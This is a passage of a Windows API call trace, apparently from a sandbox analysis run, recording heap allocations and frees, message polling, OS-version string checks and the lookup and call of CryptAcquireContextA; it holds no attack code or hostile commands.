returned 0x24b3cb8 [0200.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0200.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.129] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0200.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0200.129] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0200.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0200.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0200.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0200.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0f8 [0200.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0200.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0200.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0200.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0200.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0200.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0200.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0200.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0200.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.131] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0200.131] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0200.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.132] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0200.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0200.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0200.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.132] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0200.133] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0200.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0200.133] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0200.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0200.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0200.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0200.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0200.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0200.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0200.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0200.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0200.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.136] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0200.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0200.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0200.138] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0200.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0200.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0200.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0200.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0200.139] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0200.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0200.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0200.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0200.139] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad63f8) returned 1 [0200.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0200.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0200.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0200.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0200.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0200.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0200.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0200.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0200.142] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0200.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.142] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, 